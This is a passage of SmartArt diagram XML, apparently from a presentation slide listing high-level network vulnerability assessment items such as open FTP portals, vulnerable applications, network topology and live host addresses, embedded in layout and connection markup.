            <a:rPr lang="en-IN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Open FTP portals (Weak protection of data in transit)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{465EC011-E7D5-41C7-80F7-62C52297778A}" type="parTrans" cxnId="{B94B0311-EC51-4B03-A14E-EECBD63007E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCB7C6D0-123D-4244-A920-668F6865C5E8}" type="sibTrans" cxnId="{B94B0311-EC51-4B03-A14E-EECBD63007E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21E36975-0343-4D2A-B47E-C3B41E41B10E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Vulnerable applications, including operating systems</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E64DCBD2-B7DC-4C9F-BAA4-B073C6D38241}" type="parTrans" cxnId="{C1CA0D0B-1273-4ABC-994C-3AF17A84D147}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C19F7771-48AA-40A1-B060-320C81367B8A}" type="sibTrans" cxnId="{C1CA0D0B-1273-4ABC-994C-3AF17A84D147}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{392382A0-2B88-48D9-9599-0E80904B809B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Each piece of LAN/WAN equipment</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0B53D77-E0D4-40E6-966B-67BC1A151D33}" type="parTrans" cxnId="{321C5D6C-61C1-4433-B7D0-6A1AC47AFE12}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4475E7C-A727-4BD3-9050-9F2A4B838CBD}" type="sibTrans" cxnId="{321C5D6C-61C1-4433-B7D0-6A1AC47AFE12}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECBFB26E-0392-4BE0-9471-F44398573D05}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Find the network topology</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F7A7309-B44D-4F89-A797-24BEB7D291F3}" type="parTrans" cxnId="{64E87191-75AC-4F4E-92A5-CB307327905B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC923A48-C61B-4863-88B7-E61F9C23A164}" type="sibTrans" cxnId="{64E87191-75AC-4F4E-92A5-CB307327905B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C2C2E5E-BACB-46C8-A8D8-88C5A83BAC29}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Network addresses of live hosts, firewalls, routers, etc</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B579DFAD-089C-4DEB-BB1C-9ABE8E15358D}" type="parTrans" cxnId="{37478405-27B7-4AB9-B976-FB27F56FA7CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{863C81A2-DD60-4D9B-A766-3478B240F777}" type="sibTrans" cxnId="{37478405-27B7-4AB9-B976-FB27F56FA7CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{571BB81C-066C-4F54-9028-B08CC5CBC23A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>List of potential vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42060BDE-2F61-4D58-8C9C-984E629887A8}" type="parTrans" cxnId="{65F15AB1-71F9-4723-9465-DB7CAE294E8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AA3D842-EA7A-4468-85BA-748E40750F96}" type="sibTrans" cxnId="{65F15AB1-71F9-4723-9465-DB7CAE294E8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFF6511E-694B-433D-A816-8879F86D994E}" type="pres">
      <dgm:prSet presAssocID="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2348F657-352C-40BF-8469-9DFD9096DE3D}" type="pres">
      <dgm:prSet presAssocID="{118AC091-7E19-43CE-B253-B0E9ECA66AB5}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD5223A5-DB43-4580-9E89-68FAA7597B19}" type="pres">
      <dgm:prSet presAssocID="{118AC091-7E19-43CE-B253-B0E9ECA66AB5}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E0CA4177-66DF-4F25-9439-071F7C05842A}" type="pres">
      <dgm:prSet presAssocID="{118AC091-7E19-43CE-B253-B0E9ECA66AB5}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96A008A9-2152-4F43-BA5E-F6DD4196DED3}" type="pres">
      <dgm:prSet presAssocID="{43187662-0267-448C-8EC5-B94007A807D9}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="0" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB8BC46F-B3BB-4B38-9F94-11B0760D348F}" type="pres">
      <dgm:prSet presAssocID="{7AF2F528-4D6A-4140-92A0-A54B2185E45C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AAB2854E-1573-4813-B44B-0E40ABF9F3A9}" type="pres">
      <dgm:prSet presAssocID="{7AF2F528-4D6A-4140-92A0-A54B2185E45C}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60D8E25D-7C97-4061-8BA5-6AC64E568E6E}" type="pres">
      <dgm:prSet presAssocID="{7AF2F528-4D6A-4140-92A0-A54B2185E45C}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53B1D6E7-1EA9-40AA-AE6D-B6BBC8522E0F}" type="pres">
      <dgm:prSet presAssocID="{3BD181EC-ABB5-4268-A265-CBC863DBF2A7}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="1" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3612477-A058-45CB-9C69-39B49D4C610E}" type="pres">
      <dgm:prSet presAssocID="{39B2F951-671B-4AFB-8584-01E3DF0218AB}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D065394-3675-40F7-8AF3-277051A66EC8}" type="pres">
      <dgm:prSet presAssocID="{39B2F951-671B-4AFB-8584-01E3DF0218AB}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F59DF48C-62BC-4479-890C-9D4C209EAAD8}" type="pres">
      <dgm:prSet presAssocID="{39B2F951-671B-4AFB-8584-01E3DF0218AB}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8D2B3185-F384-4D3D-A45A-4EABB10A17D4}" type="pres">
      <dgm:prSet presAssocID="{F0159E0C-25FC-4D8D-83A2-07E5DE3A0E62}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="2" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16506F0E-16BC-498C-BD6C-39907F680932}" type="pres">
      <dgm:prSet presAssocID="{70A99B7D-855D-4C6F-BB47-6B8483EB1A53}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79163A5B-2D1F-4A36-98F4-68121B6E313C}" type="pres">
      <dgm:prSet presAssocID="{70A99B7D-855D-4C6F-BB47-6B8483EB1A53}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E93C5ABA-D66A-4A38-8A57-C8B7B978EE6E}" type="pres">
      <dgm:prSet presAssocID="{70A99B7D-855D-4C6F-BB47-6B8483EB1A53}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{72C9877A-FDD9-4192-8817-50ACCF573590}" type="pres">
      <dgm:prSet presAssocID="{CCB7C6D0-123D-4244-A920-668F6865C5E8}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="3" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{645D9658-A613-4259-BB0E-F8BB4D23E512}" type="pres">
      <dgm:prSet presAssocID="{21E36975-0343-4D2A-B47E-C3B41E41B10E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2EF1D64-4C1C-4AD7-93A8-812483A023F2}" type="pres">
      <dgm:prSet presAssocID="{21E36975-0343-4D2A-B47E-C3B41E41B10E}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3B993C7-17ED-48EE-94CE-61EA2E177E4C}" type="pres">
      <dgm:prSet presAssocID="{21E36975-0343-4D2A-B47E-C3B41E41B10E}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6B1FCD9-8491-4CAE-BB83-AC6D7619275D}" type="pres">
      <dgm:prSet presAssocID="{C19F7771-48AA-40A1-B060-320C81367B8A}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="4" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C22F00F-B970-421A-9A81-E08B05E2C6E8}" type="pres">
      <dgm:prSet presAssocID="{392382A0-2B88-48D9-9599-0E80904B809B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B3DB5FC-164F-4AF8-8749-AF2A5A69A97A}" type="pres">
      <dgm:prSet presAssocID="{392382A0-2B88-48D9-9599-0E80904B809B}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA207F68-DE03-4048-AABE-56DCACE31951}" type="pres">
      <dgm:prSet presAssocID="{392382A0-2B88-48D9-9599-0E80904B809B}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{06B807D4-A5A1-4608-B141-788390518BF2}" type="pres">
      <dgm:prSet presAssocID="{B4475E7C-A727-4BD3-9050-9F2A4B838CBD}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="5" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6645FE1C-373C-46A0-BA2C-33403FAD30BE}" type="pres">
      <dgm:prSet presAssocID="{ECBFB26E-0392-4BE0-9471-F44398573D05}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B200311A-4AB1-4064-9DA1-226B343253D4}" type="pres">
      <dgm:prSet presAssocID="{ECBFB26E-0392-4BE0-9471-F44398573D05}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F62EB9D0-0CF9-4EEE-BB4E-1F834AF4539F}" type="pres">
      <dgm:prSet presAssocID="{ECBFB26E-0392-4BE0-9471-F44398573D05}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF9E695A-BCB4-4FFE-94E0-4FACD8AA92D7}" type="pres">
      <dgm:prSet presAssocID="{AC923A48-C61B-4863-88B7-E61F9C23A164}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="6" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D6054B9-3CA6-4840-9A9B-495F0CDD8F43}" type="pres">
      <dgm:prSet presAssocID="{2C2C2E5E-BACB-46C8-A8D8-88C5A83BAC29}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5549DC4-42CD-437A-B7F0-DD4DC58630DC}" type="pres">
      <dgm:prSet presAssocID="{2C2C2E5E-BACB-46C8-A8D8-88C5A83BAC29}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD6B7ACD-EF1D-4727-829C-8CA8B8CDACA8}" type="pres">
      <dgm:prSet presAssocID="{2C2C2E5E-BACB-46C8-A8D8-88C5A83BAC29}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99F180B1-9437-4069-81E1-8757BD1AECD9}" type="pres">
      <dgm:prSet presAssocID="{863C81A2-DD60-4D9B-A766-3478B240F777}" presName="sibTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="7" presStyleCnt="8" custScaleX="126152"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA1F991C-F4A8-4739-9BA4-08EC02624E8F}" type="pres">
      <dgm:prSet presAssocID="{571BB81C-066C-4F54-9028-B08CC5CBC23A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5333FC7D-AC1D-4415-B295-06298BCF2AB9}" type="pres">
      <dgm:prSet presAssocID="{571BB81C-066C-4F54-9028-B08CC5CBC23A}" presName="dummyConnPt" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D3AB934-F3C8-492E-9ED5-B3B5B4279D38}" type="pres">
      <dgm:prSet presAssocID="{571BB81C-066C-4F54-9028-B08CC5CBC23A}" presName="node" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="9" custScaleX="126152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8D073C00-B6EB-4977-8B2E-96596AFCF255}" type="presOf" srcId="{C19F7771-48AA-40A1-B060-320C81367B8A}" destId="{B6B1FCD9-8491-4CAE-BB83-AC6D7619275D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{F455B403-B90F-4CE4-83BC-FDAFC86D7B0A}" type="presOf" srcId="{AC923A48-C61B-4863-88B7-E61F9C23A164}" destId="{AF9E695A-BCB4-4FFE-94E0-4FACD8AA92D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{37478405-27B7-4AB9-B976-FB27F56FA7CC}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{2C2C2E5E-BACB-46C8-A8D8-88C5A83BAC29}" srcOrd="7" destOrd="0" parTransId="{B579DFAD-089C-4DEB-BB1C-9ABE8E15358D}" sibTransId="{863C81A2-DD60-4D9B-A766-3478B240F777}"/>
    <dgm:cxn modelId="{2C7F3908-E47E-4AA2-9072-3745F1B90FC6}" type="presOf" srcId="{7AF2F528-4D6A-4140-92A0-A54B2185E45C}" destId="{60D8E25D-7C97-4061-8BA5-6AC64E568E6E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{C1CA0D0B-1273-4ABC-994C-3AF17A84D147}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{21E36975-0343-4D2A-B47E-C3B41E41B10E}" srcOrd="4" destOrd="0" parTransId="{E64DCBD2-B7DC-4C9F-BAA4-B073C6D38241}" sibTransId="{C19F7771-48AA-40A1-B060-320C81367B8A}"/>
    <dgm:cxn modelId="{B94B0311-EC51-4B03-A14E-EECBD63007E9}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{70A99B7D-855D-4C6F-BB47-6B8483EB1A53}" srcOrd="3" destOrd="0" parTransId="{465EC011-E7D5-41C7-80F7-62C52297778A}" sibTransId="{CCB7C6D0-123D-4244-A920-668F6865C5E8}"/>
    <dgm:cxn modelId="{688EA913-9C8D-4F51-B978-EE3941406791}" type="presOf" srcId="{2C2C2E5E-BACB-46C8-A8D8-88C5A83BAC29}" destId="{BD6B7ACD-EF1D-4727-829C-8CA8B8CDACA8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{2758A015-6160-41CE-9E11-A22FBFA1D8EE}" type="presOf" srcId="{863C81A2-DD60-4D9B-A766-3478B240F777}" destId="{99F180B1-9437-4069-81E1-8757BD1AECD9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{E5E63925-03E3-4447-B1FD-BF6CF1F6CC03}" type="presOf" srcId="{B4475E7C-A727-4BD3-9050-9F2A4B838CBD}" destId="{06B807D4-A5A1-4608-B141-788390518BF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{93983744-240C-4BD9-913E-90474BF0E42B}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{39B2F951-671B-4AFB-8584-01E3DF0218AB}" srcOrd="2" destOrd="0" parTransId="{D9AD4F75-3A0A-45F4-A2A4-AE304C82183E}" sibTransId="{F0159E0C-25FC-4D8D-83A2-07E5DE3A0E62}"/>
    <dgm:cxn modelId="{321C5D6C-61C1-4433-B7D0-6A1AC47AFE12}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{392382A0-2B88-48D9-9599-0E80904B809B}" srcOrd="5" destOrd="0" parTransId="{E0B53D77-E0D4-40E6-966B-67BC1A151D33}" sibTransId="{B4475E7C-A727-4BD3-9050-9F2A4B838CBD}"/>
    <dgm:cxn modelId="{BE399D4C-7501-4EB6-827B-10358E02A27E}" type="presOf" srcId="{70A99B7D-855D-4C6F-BB47-6B8483EB1A53}" destId="{E93C5ABA-D66A-4A38-8A57-C8B7B978EE6E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{93DCE857-ACFF-4148-AB96-25ECB3F759A5}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{118AC091-7E19-43CE-B253-B0E9ECA66AB5}" srcOrd="0" destOrd="0" parTransId="{64CCBAA0-6090-4678-BAFA-09908A1876E4}" sibTransId="{43187662-0267-448C-8EC5-B94007A807D9}"/>
    <dgm:cxn modelId="{E6F5B158-6771-4E0E-87AB-97EA3983265D}" type="presOf" srcId="{CCB7C6D0-123D-4244-A920-668F6865C5E8}" destId="{72C9877A-FDD9-4192-8817-50ACCF573590}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{44E2DA7C-63A0-432C-A1C7-2E0C09E748DB}" type="presOf" srcId="{39B2F951-671B-4AFB-8584-01E3DF0218AB}" destId="{F59DF48C-62BC-4479-890C-9D4C209EAAD8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{1B5A4085-9E5C-4E87-9B4D-00A4DB7182AF}" type="presOf" srcId="{43187662-0267-448C-8EC5-B94007A807D9}" destId="{96A008A9-2152-4F43-BA5E-F6DD4196DED3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{64E87191-75AC-4F4E-92A5-CB307327905B}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{ECBFB26E-0392-4BE0-9471-F44398573D05}" srcOrd="6" destOrd="0" parTransId="{1F7A7309-B44D-4F89-A797-24BEB7D291F3}" sibTransId="{AC923A48-C61B-4863-88B7-E61F9C23A164}"/>
    <dgm:cxn modelId="{177EB5A0-B657-458D-AF75-AAC83FB6BFE1}" type="presOf" srcId="{3BD181EC-ABB5-4268-A265-CBC863DBF2A7}" destId="{53B1D6E7-1EA9-40AA-AE6D-B6BBC8522E0F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{F11BBFA4-D7BD-4630-A062-68DC9CBA128C}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{7AF2F528-4D6A-4140-92A0-A54B2185E45C}" srcOrd="1" destOrd="0" parTransId="{DD975546-1370-4B40-A517-28219A34F90A}" sibTransId="{3BD181EC-ABB5-4268-A265-CBC863DBF2A7}"/>
    <dgm:cxn modelId="{65F15AB1-71F9-4723-9465-DB7CAE294E8A}" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{571BB81C-066C-4F54-9028-B08CC5CBC23A}" srcOrd="8" destOrd="0" parTransId="{42060BDE-2F61-4D58-8C9C-984E629887A8}" sibTransId="{7AA3D842-EA7A-4468-85BA-748E40750F96}"/>
    <dgm:cxn modelId="{98081BC8-733F-4398-A843-E08E1EFDBF5F}" type="presOf" srcId="{ECBFB26E-0392-4BE0-9471-F44398573D05}" destId="{F62EB9D0-0CF9-4EEE-BB4E-1F834AF4539F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{027872CA-F136-4FDF-B1B7-A27864BDECB6}" type="presOf" srcId="{571BB81C-066C-4F54-9028-B08CC5CBC23A}" destId="{1D3AB934-F3C8-492E-9ED5-B3B5B4279D38}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{30AA36CB-6981-4CBB-8EFA-F39111BEEA1D}" type="presOf" srcId="{118AC091-7E19-43CE-B253-B0E9ECA66AB5}" destId="{E0CA4177-66DF-4F25-9439-071F7C05842A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{3578B5CF-44A7-46E3-8ED2-F775898F5335}" type="presOf" srcId="{21E36975-0343-4D2A-B47E-C3B41E41B10E}" destId="{F3B993C7-17ED-48EE-94CE-61EA2E177E4C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{F008ECD7-C8AE-4A4F-9127-0A9CAF0F0216}" type="presOf" srcId="{F0159E0C-25FC-4D8D-83A2-07E5DE3A0E62}" destId="{8D2B3185-F384-4D3D-A45A-4EABB10A17D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{56A09FF5-630E-4E84-A82A-BEFAABC53CFE}" type="presOf" srcId="{392382A0-2B88-48D9-9599-0E80904B809B}" destId="{AA207F68-DE03-4048-AABE-56DCACE31951}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{13098AFD-F3B5-4F01-ACA6-DB779C82421E}" type="presOf" srcId="{7A3525E9-E4D2-430D-97D8-1FAEC3351692}" destId="{EFF6511E-694B-433D-A816-8879F86D994E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{83FF2F71-0884-4211-9995-D713013F4545}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{2348F657-352C-40BF-8469-9DFD9096DE3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{F9FEC6F5-352E-4C39-A72B-6F0EFDBA2AD7}" type="presParOf" srcId="{2348F657-352C-40BF-8469-9DFD9096DE3D}" destId="{BD5223A5-DB43-4580-9E89-68FAA7597B19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
